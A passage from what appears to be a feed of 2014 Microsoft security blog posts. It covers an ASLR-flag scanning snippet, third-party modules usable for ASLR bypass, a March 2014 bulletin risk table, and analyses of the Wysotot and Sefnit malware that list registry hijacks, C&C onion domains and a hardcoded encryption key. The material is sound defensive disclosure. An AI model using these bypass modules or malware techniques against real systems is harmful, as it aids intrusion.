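    # 0x0100 is NX_COMPAT; only the first image also carries DYNAMIC_BASE with its relocations intact.
    for name, img in [("aslr.dll", build_minimal_pe(0x0140)),
                      ("legacy.dll", build_minimal_pe(0x0100)),
                      ("stripped.dll", build_minimal_pe(0x0040, file_characteristics=0x2103))]:
        print(name, aslr_status(img))
```

As the post notes, IE 10/11 and Office 2013 (and EMET's Mandatory ASLR) rebase such modules anyway; the scan is for finding the modules that would still be a gap in older products.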
In fact, security researchers are frequently scanning for popular 3</span><sup><span style="font-size:small;">rd</span></sup><span style="font-size:medium;"> party libraries not compiled with /DYNAMICBASE that can allow a bypass; the following list is just an example of few common ones.</span></span></p> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <table style="width:525px;height:489px;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td width="252" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><b><span style="font-family:Calibri;"><span style="font-size:medium;">3</span><sup><span style="font-size:small;">rd</span></sup><span style="font-size:medium;"> PARTY ASLR BYPASS</span></span></b></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="378" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><b><span style="font-family:Calibri;font-size:medium;">REFERENCE</span></b></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> <tr> <td width="252" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">Java 1.6.x (MSVCR71.DLL)</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="378" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;Very common ASLR bypass used in-the-wild for multiple CVEs<br /><br />&nbsp;NOTE: Java 1.7.x uses MSVCR100.DLL which supports ASLR<br /></span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> <tr> <td width="252" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">DivX Player 10.0.2</span></p> <span style="font-family:Times New 
Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">Yahoo Messenger 11.5.0.228</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-size:medium;">AOL Instant Messenger 7.5.14.8</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="378" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;Ref: </span><a href="http://www.greyhathacker.net/?p=756"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">http://www.greyhathacker.net/?p=756</span></a><span style="font-family:Times New Roman;font-size:medium;">&nbsp;<br /></span><span style="font-family:Calibri;font-size:medium;">&nbsp;(not seen in real attacks)</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> <tr> <td width="252" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">DropBox<br /></span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="378" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;Ref:</span><a href="http://codeinsecurity.wordpress.com/2013/09/09/installing-dropbox-prepare-to-lose-aslr/"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">http://codeinsecurity.wordpress.com/2013/09/09/installing-dropbox-prepare-to-lose-aslr/</span></a><br /><span style="font-family:Calibri;font-size:medium;"><br />&nbsp;(not seen in real attacks)</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span 
style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> <tr> <td width="252" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-size:medium;">veraport20.Veraport20Ctl<br /> <br />Gomtvx.Launcher</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-size:medium;">INIUPDATER.INIUpdaterCtrl</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> <td width="378" valign="top"><span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;"><span style="font-family:Calibri;font-size:medium;">&nbsp;Ref: KISA report </span><a href="http://boho.or.kr/upload/file/EpF448.pdf"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">http://boho.or.kr/upload/file/EpF448.pdf</span></a></span></p> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;(seen in-the-wild with CVE-2013-3893</span>)</p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p></p> <span style="font-family:Times New Roman;font-size:medium;"> </span> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <span style="font-family:Times New Roman;font-size:medium;"> </span></td> </tr> </tbody> </table> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <p style="text-align:justify;"><span style="font-family:Calibri;"><span style="font-size:medium;">As noted at beginning of this blog, Internet Explorer 10/11 and Office 2013 are not affected by ASLR bypasses introduced by 3</span><sup><span style="font-size:small;">rd</span></sup><span style="font-size:medium;"> party modules and plugins. 
Instead, customers still running older version of Internet Explorer and Office can take advantage of two effective tools that can be used to enforce ASLR mitigation for any module:</span></span></p> <ul style="text-align:justify;"> <li> <p><span style="font-size:medium;"><span style="text-decoration:underline;"><a href="http://www.microsoft.com/emet">EMET (Enhanced Mitigation Experience Toolkit)</a></span>: can be used to enable system-wide <span style="font-size:medium;">ASLR </span>or &ldquo;MandatoryASLR&rdquo; selectively on any process;</span></p> </li> <li> <p><span style="font-size:medium;"><span style="text-decoration:underline;"><a href="http://support.microsoft.com/kb/2639308">&ldquo;Force ASLR&rdquo; update KB2639308</a></span>: makes possible for selected applications to forcibly relocate images not built with /DYNAMICBASE using Image File Execution Options (IFEO) registry keys;</span></p> <p>&nbsp;</p> </li> </ul> <p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;"><strong>Conclusions</strong><br /></span></p> <p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;">ASLR bypasses do not represent vulnerabilities, since they have to be combined with a real memory corruption vulnerability in order to allow attackers to create an exploit, however it&#39;s nice to see that closing ASLR bypasses can negatively&nbsp;impact the reliability of certain targeted attacks. </span><span style="font-family:Calibri;font-size:medium;">We encourage all customers to proactively test and deploy the suggested tools when possible, especially for old programs commonly targeted by memory corruption exploits. 
We expect that attackers will continue increasing their focus and research on </span><span style="font-family:Calibri;font-size:medium;"><a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/10/aslr-bypass-apocalypse-in-lately-zero-day-exploits.html">more sophisticated ASLR bypasses </a></span><span style="font-family:Calibri;font-size:medium;">which rely on disclosure of memory address rather than non-ASLR libraries.</span><span style="font-family:Calibri;font-size:medium;"><br /></span></p> <p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <p style="text-align:justify;"><span style="font-size:medium;">- Elia Florio, MSRC Engineering</span></p> <p style="text-align:justify;"><span style="font-size:medium;">&nbsp;</span></p> </div> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3624728&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">VSAVB7RTCVE-2014-0324ForceASLRMS13-006ASLRMS14-009HXDSLdrHotPatchRoutineEMET Assessing risk for the March 2014 security updates http://blogs.technet.com/b/srd/archive/2014/03/11/assessing-risk-for-the-march-2014-security-updates.aspxTue, 11 Mar 2014 17:02:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:a93f3f3c-3f79-43e0-ab81-3932d4cc1f8aSRD Blog Author0<p>Today we released five security bulletins addressing 23 unique CVE&rsquo;s. Two bulletins have a maximum severity rating of Critical while the other three have a maximum severity rating of Important. 
We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</p> <table border="1"> <tbody> <tr> <td><b>Bulletin</b></td> <td><b>Most likely attack vector</b></td> <td><b>Max Bulletin Severity</b></td> <td><b>Max Exploitability</b></td> <td><b>Likely first 30 days impact</b></td> <td><b>Platform mitigations and key notes</b></td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-012">MS14-012</a> <p>(Internet Explorer)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Addresses vulnerability described by <a href="http://technet.microsoft.com/en-us/security/advisory/2934088">Security Advisory 2934088</a>, an issue under targeted attack.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-013">MS14-013</a> <p>(DirectShow)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>3</td> <td>Unlikely to see reliable exploits developed within next 30 days.</td> <td>Addresses a single double-free issue in qedit.dll, reachable via a malicious webpage.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-014">MS14-014</a> <p>(Silverlight)</p> </td> <td>Attacker combines this vulnerability with a (separate) code execution vulnerability to execute arbitrary code in the browser security context.</td> <td>Important</td> <td>n/a</td> <td>No chance for direct code execution with this vulnerability.</td> <td>This vulnerability does not result in code execution directly. However, it is a component attackers could use to bypass ASLR.</td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-015">MS14-015</a> <p>(Kernel mode drivers)</p> </td> <td>Attacker running code at low privilege runs exploit binary to elevate to SYSTEM.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td></td> </tr> <tr> <td><a href="http://technet.microsoft.com/en-us/security/bulletin/MS14-016">MS14-016</a> <p>(Security Account Manager)</p> </td> <td>An attacker able to make API calls to the Security Account Manager password API can make brute-force password guessing attempts without triggering the account lockout policy.</td> <td>Important</td> <td>n/a</td> <td>No chance for direct code execution with this vulnerability.</td> <td>Attacker must authenticate before calling the affected API. After authenticating, the attacker can choose to guess either their own or another user&#39;s password without risk of lockout.</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC engineering team</p><div style="clear:both;"></div> The March 2014 Security Updates http://blogs.technet.com/b/msrc/archive/2014/03/11/the-march-2014-security-updates.aspx Tue, 11 Mar 2014 17:01:00 GMT Dustin C. Childs <p><span style="font-family:Calibri;font-size:medium;">This month we release </span><a href="http://technet.microsoft.com/security/bulletin/MS14-mar"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">five bulletins</span></a><span style="font-family:Calibri;font-size:medium;"> to address 23 unique CVEs in Microsoft Windows, Internet Explorer and Silverlight. 
If you need to prioritize, the update for Internet Explorer addresses the issue first described in </span><a href="http://technet.microsoft.com/en-us/security/advisory/2934088"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Security Advisory 2934088</span></a><span style="font-family:Calibri;font-size:medium;">, so it should be at the top of your list. While that update does warrant your attention, I want to also call out another impactful update.</span></p> <p><span style="font-family:Calibri;font-size:medium;">MS14-014 provides an update to address a security feature bypass in Silverlight. The issue wasn&rsquo;t publicly known and it isn&rsquo;t under active attack; however, it can impact your security in ways that aren&rsquo;t always obvious. Specifically, the update removes an avenue attackers could use to bypass </span><a href="http://msdn.microsoft.com/en-us/library/bb430720.aspx"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">ASLR</span></a><span style="font-family:Calibri;font-size:medium;"> protections. Fixes like this one increase the cost of exploitation to an attacker, who must now find a different way to make their code execution exploit reliable. Picasso said, &ldquo;The hidden harmony is better than the obvious.&rdquo; Shutting down an ASLR bypass could be considered one of the most harmonious things to do to help increase customer security.</span></p> <p><span style="font-family:Calibri;font-size:medium;">Let&rsquo;s not forget the other updates we released today. This month we release two Critical and three Important bulletins. Here&rsquo;s an overview of this month&rsquo;s release:</span></p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/2248.March_5F00_Deployment.jpg"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/2248.March_5F00_Deployment.jpg" border="0" /></a></p> <p><span style="font-family:Calibri;font-size:medium;">Our top deployment priority this month is MS14-012, which addresses 18 issues in Internet Explorer.</span></p> <p><a href="http://technet.microsoft.com/security/bulletin/ms14-012"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">MS14-012 | Cumulative Security Update for Internet Explorer</span></a><span style="font-family:Calibri;font-size:medium;"><br /> This cumulative update addresses one public and 17 privately disclosed issues in Internet Explorer. These issues could allow remote code execution if a user views a specially crafted webpage using an affected version of Internet Explorer. We are aware of targeted attacks using CVE-2014-0322 against Internet Explorer 10. This issue was first described in </span><a href="http://technet.microsoft.com/security/advisory/2934088"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Security Advisory 2934088</span></a><span style="font-family:Calibri;font-size:medium;">, which included a </span><a href="https://support.microsoft.com/kb/2934088"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Fix it</span></a><span style="font-family:Calibri;font-size:medium;"> for the issue. 
We should also note that the observed attacks performed a check for the presence of the Enhanced Mitigation Experience Toolkit (EMET) and did not proceed if it was detected. This update also addresses CVE-2014-0324, which is a privately reported issue that has been seen in a very limited, targeted attack against Internet Explorer 8. Thanks to a previously released ASLR bypass update, the attack seen in the wild would not work against a fully updated system running Windows Vista and above. The </span><a href="http://blogs.technet.com/b/srd/archive/2014/03/11/when-aslr-makes-the-difference.aspx"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">SRD blog</span></a><span style="font-family:Calibri;font-size:medium;"> goes into more detail about how shutting down that </span><a href="http://technet.microsoft.com/security/bulletin/ms13-106"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">bypass</span></a><span style="font-family:Calibri;font-size:medium;"> helped. For all issues addressed by this update, successful exploitation could allow an attacker to gain the same user rights as the local user. Customers with automatic updates enabled will not need to take action, as they will be updated automatically.</span></p> <p><span style="font-family:Calibri;font-size:medium;">We are also revising </span><a href="http://technet.microsoft.com/security/advisory/2755801"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Security Advisory 2755801</span></a><span style="font-family:Calibri;font-size:medium;"> with the latest update for Adobe Flash Player in Internet Explorer. The update addresses the vulnerabilities described in Adobe Security bulletin </span><a href="http://helpx.adobe.com/security/products/flash-player/apsb14-08.html" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">APSB14-08</span></a><span style="font-family:Calibri;font-size:medium;">. 
For more information about this update, including download links, see </span><a href="http://support.microsoft.com/kb/2938527" target="_blank"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Microsoft Knowledge Base Article 2938527</span></a><span style="font-family:Calibri;font-size:medium;">. Also, for those of you who may be interested, </span><a href="https://support.microsoft.com/kb/894199"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">KB894199</span></a><span style="font-family:Calibri;font-size:medium;"> provides a list of the non-security updates released today. This list includes the latest update for the Malicious Software Removal Tool (MSRT), which now includes detections for the </span><a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32%2fWysotot"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Wysotot</span></a><span style="font-family:Calibri;font-size:medium;"> and </span><a href="http://www.microsoft.com/security/portal/threat/Encyclopedia/Entry.aspx?Name=BrowserModifier:Win32/Spacekito"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Spacekito</span></a><span style="font-family:Calibri;font-size:medium;"> malware families. 
</span></p> <p><span style="font-family:Calibri;font-size:medium;">Watch the bulletin overview video below for a brief summary of today&#39;s releases.</span></p> <p><span style="font-family:Calibri;font-size:medium;"><object width="500" height="281"><param name="movie" value="//www.youtube.com/v/fa536jd5zfQ?version=3&amp;hl=en_US" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed width="500" height="281" src="http://www.youtube.com/v/fa536jd5zfQ?version=3&amp;hl=en_US" type="application/x-shockwave-flash" /></object></span></p> <p><span style="font-family:Calibri;font-size:medium;">For more information about this month&rsquo;s security updates, including the detailed view of the Exploit Index broken down by CVE, visit the </span><a href="http://technet.microsoft.com/security/bulletin/MS14-Mar"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">Microsoft Bulletin Summary Webpage</span></a><span style="font-family:Calibri;font-size:medium;">. </span></p> <p><span style="font-family:Calibri;font-size:medium;">My colleagues Andrew Gross and Pete Voss will host the monthly bulletin webcast and answer your questions about this month&rsquo;s release. As usual, the webcast is scheduled for Wednesday, March 12, 2014, at 11 a.m. PDT. Please register </span><a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572977&amp;Culture=en-US"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">here</span></a><span style="font-family:Calibri;font-size:medium;">, and tune in to learn more about this month&rsquo;s security bulletins and advisories. </span></p> <p><span style="font-family:Calibri;font-size:medium;">For all the latest information, you can also follow us at </span><a href="http://www.twitter.com/msftsecresponse"><span style="color:#0563c1;font-family:Calibri;font-size:medium;">@MSFTSecResponse</span></a><span style="font-family:Calibri;font-size:medium;">. 
</span></p> <p><span style="font-family:Calibri;font-size:medium;">If you happen to be at the CanSecWest conference in Vancouver, B.C., please swing by our booth (number 4) to say hello!</span></p> <p>Thanks, <br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;">Dustin Childs</span></a> <br /> Group Manager, Response Communications <br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div> MSRT March 2014 – Wysotot http://blogs.technet.com/b/mmpc/archive/2014/03/11/msrt-march-2014-wysotot.aspx Tue, 11 Mar 2014 16:00:00 GMT msft-mmpc <div class="ExternalClass1C75481000774D0C8E48842B4D80E1E1"> <p>This month the Microsoft Malicious Software Removal Tool (MSRT) will include the <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Wysotot">Win32/Wysotot</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=MSIL/Spacekito">MSIL/Spacekito</a> families. Below we discuss the history and common behaviors of the Win32/Wysotot family of malware.</p> <p>We first added detection for Win32/Wysotot in October 2013. 
Figure 1 shows the number of machine encounters since then.&nbsp;</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Wyso1b.png"><img alt="DESCRIPTION" src="http://www.microsoft.com/security/portal/blog-images/a/Wyso1b.png" border="0" /></a>&nbsp;</p> <p><em>Figure 1: Wysotot detections</em></p> <p>Win32/Wysotot is usually installed by software bundlers. Figure 2 shows some of the programs we have seen downloading Win32/Wysotot variants.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Wyso2.png"><img alt="DESCRIPTION" src="http://www.microsoft.com/security/portal/blog-images/a/Wyso2.png" border="0" /></a>&nbsp;</p> <p><em>Figure 2: Programs that we have seen bundle Win32/Wysotot variants</em></p> <p>Win32/Wysotot can change the start page for common web browsers. The malware executes its payload in two ways:</p> <ol> <li>Modifying the following registry entry:<br /><em>HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command = &quot;&quot;C:\Program Files\Internet Explorer\iexplore.exe&quot; hxxp://en.v9.com/?utm_source=b&amp;utm_medium=eBP&amp;utm_campaign=eBP&amp;utm_content=sc&amp;from=eBP&amp;uid=&lt;some text&gt;&amp;ts=&lt;some timestamp&gt;&ldquo;</em></li> <li>Modifying .LNK files that point to popular browsers (Internet Explorer, Firefox, Chrome and Opera). 
Win32/Wysotot modifies the .LNK files by searching for browser .LNKs harvested in one of two ways:</li> </ol> <ul> <li>It determines the location for Programs in the Start Menu <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Wyso3.png"><img width="400" alt="DESCRIPTION" src="http://www.microsoft.com/security/portal/blog-images/a/Wyso3.png" border="0" /></a></p> </li> <li>A hardcoded path to the Quick Launch folder <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Wyso4.png"><img width="400" alt="DESCRIPTION" src="http://www.microsoft.com/security/portal/blog-images/a/Wyso4.png" border="0" /></a></p> </li> </ul> <p>Through the folders mentioned above, Win32/Wysotot will search for all .LNK files and then check whether each one is related to a web browser that it targets. If it finds a match, it modifies the .LNK file directly.</p> <p>In our testing, the modified browser start pages commonly point to one of the following domains:</p> <ul> <li><em>delta-homes.com</em></li> <li><em>onmylike.com</em></li> <li><em>v9.com</em></li> <li><em>v9tr.com</em></li> <li><em>22find.com</em></li> </ul> <p>Figure 3 shows a sample screenshot of the modified .LNK file.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Wyso5.png"><img alt="DESCRIPTION" src="http://www.microsoft.com/security/portal/blog-images/a/Wyso5.png" border="0" /></a></p> <p><em>Figure 3: The modified .LNK file</em></p> <p>There is more detailed information about this family in the <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Wysotot">Win32/Wysotot</a> description. 
The best protection from this and other threats is to run a real-time, up-to-date security product, such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a>.</p> <p><em>Edgardo Diaz</em></p> <p><em>MMPC</em></p> </div><div style="clear:both;"></div> Advance Notification Service for the March 2014 Security Bulletin Release http://blogs.technet.com/b/msrc/archive/2014/03/06/advance-notification-server-for-the-march-2014-security-bulletin-release.aspx Thu, 06 Mar 2014 18:00:00 GMT Dustin C. Childs <p><span style="font-family:helvetica;font-size:small;">Today we provide <a href="http://technet.microsoft.com/security/bulletin/MS14-mar"><span style="color:#0563c1;">advance notification</span></a> for the release of five bulletins for March 2014, two rated Critical and three rated Important in severity. These updates address issues in Microsoft Windows, Internet Explorer and Silverlight.</span></p> <p><span style="font-family:helvetica;font-size:small;">The update provided in MS14-012 fully addresses the issue first described in <a href="http://technet.microsoft.com/security/advisory/2934088"><span style="color:#0563c1;">Security Advisory 2934088</span></a>. While we have seen a limited number of attacks using this issue, they have only targeted Internet Explorer 10. Customers using other versions of Internet Explorer have not been impacted.</span></p> <p><span style="font-family:helvetica;font-size:small;">As always, we&rsquo;ve scheduled the security bulletin release for the second Tuesday of the month, March 11, 2014, at approximately 10:00 a.m. PDT. 
Revisit this blog then for analysis of the risk and impact, as well as deployment guidance, together with a brief video overview of the month&rsquo;s updates. Until then, please review the <a title="ANS summary page" href="http://technet.microsoft.com/security/bulletin/MS14-mar"><span style="color:#0563c1;">ANS summary page</span></a> for more information to help you prepare for security bulletin testing and deployment.</span></p> <p><span style="font-family:helvetica;font-size:small;">Don&rsquo;t forget, you can also follow the MSRC team&rsquo;s recent activity on Twitter at <a title="@MSFTSecResponse" href="https://twitter.com/msftsecresponse"><span style="color:#0563c1;">@MSFTSecResponse</span></a>.</span></p> <p><span style="font-family:helvetica;font-size:small;">Thank you,</span><br /><span style="font-family:helvetica;font-size:small;"><a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;">Dustin Childs</span></a></span><br /><span style="font-family:helvetica;font-size:small;">Group Manager, Response Communications</span><br /><span style="font-family:helvetica;font-size:small;">Microsoft Trustworthy Computing</span></p><div style="clear:both;"></div> Sefnit&rsquo;s Tor botnet C&amp;C details http://blogs.technet.com/b/mmpc/archive/2014/03/05/sefnit-s-tor-botnet-c-amp-c-details.aspx Wed, 05 Mar 2014 21:54:00 GMT msft-mmpc <div class="ExternalClassB6D358E92DA249E6BEEDE55B2A394941"> <p>We have talked about the impact that resulted from the <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/09/tackling-the-sefnit-botnet-tor-hazard.aspx">Sefnit botnet Tor 
hazard</a> as well as the clean-up effort that went into that threat. In this post we&rsquo;d like to introduce some of the details regarding the Tor component&rsquo;s configuration and its communication with the Tor service. Specifically, we&rsquo;ll talk about how <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Sefnit.AT">Trojan:Win32/Sefnit.AT</a> communicates with the Tor network, what domains it tries to contact, and where it keeps its configuration data.</p> <p>After Sefnit installs the Tor-based malware component, which is typically named <em>wins.exe</em>, a copy of a non-malicious Tor client is also installed and added as a Windows service. This service is started every time Windows starts and is configured to accept connections on TCP ports 9051 and 9050. However, since these ports are bound to the loopback interface, which is not remotely accessible, no additional threats are added to the infected PC.</p> <h3>Tor service interaction</h3> <p>The TCP port 9051 is the control port for the legitimate local Tor service and is used to control most of the aspects of a Tor client. So far, however, we have only observed this port being used by malware to obtain status information regarding the connection to the Tor network. This is accomplished by periodically requesting status updates using the <a href="https://gitweb.torproject.org/torspec.git?a=blob_plain;hb=HEAD;f=control-spec.txt">control protocol</a>.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Seft1.jpg"> <img alt="empty authentication request" src="http://www.microsoft.com/security/portal/blog-images/a/Seft1.jpg" border="0" /></a>&nbsp;</p> <p><em>Figure 1: Malware sends an empty authentication request </em></p> <p>From this example we can see that Win32/Sefnit.AT sends an empty authentication request and receives a successful response (250), which means that all authentication methods for the installed Tor client are disabled. 
Since the TCP port is not accessible remotely, the lack of authentication poses no threat to the victim&rsquo;s PC. Additionally, the malware requests the current state of a Tor circuit, which in this case is established, meaning the Tor client is connected to the anonymizing network.</p> <p>The TCP port 9050 is used as a communication point for the SOCKS proxy, which allows any application that can be configured to use a proxy server to communicate over Tor. The malware uses this method to contact its command and control (C&amp;C) web servers. This bypasses the traditional network infrastructure since traffic over the Tor network is encrypted, which also prevents network-based IDS from detecting the malware. The C&amp;C endpoints utilize the <a href="https://www.torproject.org/docs/hidden-services.html.en">Tor hidden service</a> which allows using the anonymizing network to host web servers without compromising the location and identity of the server owners.</p> <p>In order to contact a web server that uses the Tor hidden service feature the network uses a special domain naming scheme. The server&rsquo;s name is derived from its public key within the Tor network appended with <em>.onion </em>as the <a href="http://archive.icann.org/en/tlds/">top level domain</a> as opposed to .<em>com</em> or .<em>net</em>. 
The malware contains a list of .<em>onion</em> domains that are contacted using the standard HTTP protocol (over SOCKS).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Seft2.jpg"> <img width="500" alt="Sefnit attempts to create a proxy connection" src="http://www.microsoft.com/security/portal/blog-images/a/Seft2.jpg" border="0" /></a></p> <p><em>Figure 2: Sefnit attempts to create a proxy connection</em></p> <p>From this example we can see the malware attempts to create a proxy connection to the <em>lqqciuwa5yzxewc3.onion</em> domain and succeeds. 
Next, data is submitted to the <em>/cache</em> directory on that server, which replies with a successful status code (200).</p> <h3>Malware configuration details</h3> <p>The list of C&amp;C servers is stored inside a unique file and folder combination that at first glance appears to be randomly generated, although the names have not changed much over time. Specifically, the malware creates a directory named <em>049e7fb749be2cdf169e28bb0a27254f</em> and inside it places two files named <em>181084e525a65ef540c63d60ce07f836</em>, one with the extension .<em>ct</em> and one with .<em>ph</em>.</p> <p>During closer examination we identified that the apparently random directory name is actually produced by using the MD4 cryptographic hash function to compute a digest of the Unicode string <em>ps</em>. The resulting binary digest is converted into its hex representation and used as the directory name.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Seft3.png"><img width="500" alt="binary digest calculation" src="http://www.microsoft.com/security/portal/blog-images/a/Seft3.png" border="0" /></a></p> <p><em>Figure 3: Calculation of the binary digest</em></p> <p>To generate the file names the same hash function is used, but this time to compute the digest of the Unicode GUID string {<em>b3717590-6447-47db-abca-a304803890cb</em>}, which after hex conversion results in <em>181084e525a65ef540c63d60ce07f836</em>.</p> <p>The PH file (<em>181084e525a65ef540c63d60ce07f836.ph</em>) may serve as a botnet identifier, since the data inside remains fairly static. In fact, it is the <a href="http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf">AES-256</a> encrypted version of the same GUID string, using the encryption key <em>#?oUs?ai??+yIIZ?S?dcvDzI XOewA2</em>. 
This key is hard-coded in the malware binary.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Seft4.png"><img width="500" alt="The encryption key is hard coded" src="http://www.microsoft.com/security/portal/blog-images/a/Seft4.png" border="0" /></a></p> <p><em>Figure 4: The encryption key is hard-coded in the malware binary</em></p> <p>The CT file (<em>181084e525a65ef540c63d60ce07f836.ct</em>) contains the actual configuration data, which is also encrypted using the AES-256 algorithm with the same encryption key. The decrypted data is a serialized object, which appears to have been created using the Boost C++ library, and contains the following information:</p> <ul> <li>The victim&rsquo;s public IP address</li> <li>A string resembling an ID (for example, Verna), which is taken from the XOR-obfuscated data inside the malware</li> <li>The list of C&amp;C domains</li> <li>The current working directory of the malware</li> </ul> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Seft5.png"><img width="500" alt="decrypted data" src="http://www.microsoft.com/security/portal/blog-images/a/Seft5.png" border="0" /></a></p> <p><em>Figure 5: The decrypted data is a serialized object</em></p> <p>Such configuration files are detected as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Sefnit%21cfg">Trojan:Win32/Sefnit!cfg</a>.</p> <p>In conclusion, we have a couple of interesting observations. First, the cryptographic code is compiled into the malware, as opposed to being dynamically loaded from an external DLL. Specifically, the code is based on the <a href="http://www.openssl.org/news/">OpenSSL</a> library version 1.0.0d, released in February 2011. 
